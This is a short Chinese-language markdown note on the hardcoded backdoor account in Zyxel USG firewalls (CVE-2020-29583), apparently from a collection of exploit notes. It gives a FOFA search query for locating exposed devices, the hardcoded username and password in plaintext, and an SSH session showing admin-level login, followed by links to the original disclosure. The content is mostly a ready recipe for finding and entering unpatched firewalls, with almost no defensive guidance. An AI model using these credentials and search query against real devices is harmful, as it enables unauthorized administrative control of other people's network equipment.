Zyxel USG Series 账户硬编码漏洞(CVE-2020-29583).md
574 B / 2021-05-21 09:14:38
# Zyxel USG Series 账户硬编码漏洞(CVE-2020-29583)
FOFA:
```
title="USG40"
```
```bash
Username: zyfwp
Password: PrOw!aN_fXp
```
该帐户可以同时在SSH和Web界面上使用。
```bash
$ ssh [email protected]
Password: Pr*******Xp
Router> show users current
No: 1
Name: zyfwp
Type: admin
(...)
Router>
```
![](media/16096787060610/16096787506272.jpg)
ref:
* https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
* https://twitter.com/dozernz/status/1344435468868358145
* https://forum.ywhack.com/thread-114904-1-1.html